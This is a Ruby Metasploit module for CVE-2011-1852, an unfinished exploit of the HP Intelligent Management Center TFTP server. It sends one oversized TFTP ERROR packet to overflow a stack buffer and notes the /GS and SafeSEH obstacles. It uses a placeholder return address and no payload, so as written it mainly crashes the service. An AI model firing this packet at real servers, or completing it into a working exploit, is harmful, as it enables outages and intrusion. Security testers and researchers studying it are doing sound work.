##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Work-in-progress module for CVE-2011-1852 (HP Intelligent Management
# Center tftpserver).  The 'Name' below is tagged [INCOMPLETE] and the only
# target 'Ret' is the 0x41414141 placeholder, so as written the module is a
# crash/overflow probe, not a working exploit: #exploit sends one oversized
# TFTP ERROR packet and never embeds a payload.
class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	# Provides connect_udp / udp_sock / disconnect_udp used in #exploit.
	include Msf::Exploit::Remote::Udp

	# Registers the module metadata with the framework via update_info.
	#
	# @param info [Hash] base info hash supplied by the framework; the values
	#   below are merged on top of it.
	#
	# Notes grounded in the metadata itself:
	# * 'Payload' => 'Space' is 500, but #exploit never references the payload,
	#   so the space/badchar settings are currently unused.
	# * 'Targets' holds a single entry whose 'Ret' is 0x41414141 — a
	#   placeholder, consistent with the [INCOMPLETE] tag in 'Name'.
	# * The description records the author's findings: inputs over 1100 bytes
	#   do not reach the vulnerable copy, /GS and SafeSEH are in play, and the
	#   copy routine was observed at 0x405331 on XP SP3.
	def initialize(info={})
		super(update_info(info,
			'Name'           => "[INCOMPLETE] HP Intelligent Management Center tftpserver ERROR Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability found on HP Intelligent Management Center's
				TFTP service.  By either supplying a malformed DATA or ERROR TFTP packet, the process
				will copy the user input into a fixed-length buffer on the stack, which results in
				arbitrary code execution under the context of the SYSTEM user.
				
				Note: If the user input exceeds 1100 bytes, the vulnerable code won't trigger. Even if
				you're able to trigger it (send about 1000 bytes), overwrite the SEH, /GS is still
				enabled, and we don't seem to be raising an exception before @__security_check_cookie()
				is called (which leads to kernel32.TerminateProcess). Also, all loded modules are safeseh
				protected.  Use an address outside the range of loaded modules, perhaps?

				The copying routine is at 0x405331 (XP SP3).
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision$",
			'Author'         =>
				[
					'sinn3r',  #Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2011-1852' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-164/' ],
					[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02822750' ],
				],
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "seh",  #none/process/seh
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# 0x41414141 is a placeholder return address, not a real gadget.
					[ 'Windows XP SP3', {'Ret'=>0x41414141} ],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 1 2011",
			'DefaultTarget'  => 0))
	end

	# Sends a single malformed TFTP ERROR packet to the target over UDP.
	#
	# Only `err` goes on the wire (udp_sock.put below); the `data` packet is
	# built but never sent, and the request packet is commented out entirely.
	# Neither packet contains the payload — the message field is a 550-byte
	# filler, so a successful run ends in a crash rather than code execution.
	#
	# @return [void]
	def exploit
		print_status("Sending packet...")

		connect_udp

		#1 = Read; 2 = Write; 3 = Data; 4 = ACK; 5 = Err
		#http://www.freesoft.org/CIE/RFC/1350/5.htm

		#Initial packet. Probably don't need to use this.
		# (Kept as a =begin/=end block comment: this RRQ/WRQ-style packet is
		# never assembled or sent.)
=begin
		pkt  = ''
		pkt <<  "\x00\x05"  #Opcode
		pkt << "\x41"*4     #Filename
		pkt << "\x00"       #Null byte terminator
		pkt << "netascii"   #Mode
		pkt << "\x00"       #Null byte terminator
=end

		#Data packet
		# NOTE: `data` is assembled but never sent — only `err` is put on the
		# socket below.  Left in place as the author's alternate (DATA-opcode)
		# trigger mentioned in the description.
		data = ''
		data << "\x00\x03"  #Opcode
		data << "\x00\x01"  #Block number
		data << "\x41"*1000    #Data

		#Error packet
		# Layout follows RFC 1350 ERROR: opcode 5, 2-byte error code,
		# NUL-terminated message.  The message is 550 filler bytes, which is
		# the oversized field that reaches the fixed-length stack buffer.
		err  = ''
		err << "\x00\x05"   #Opcode
		err << "\x00\x01"   #Error code
		err << "\x41"*550     #Message
		err << "\x00"       #Null byte terminator

		# Fire-and-forget: no response is read, so success/failure is not
		# observed here.
		udp_sock.put(err)

		disconnect_udp
	end
end
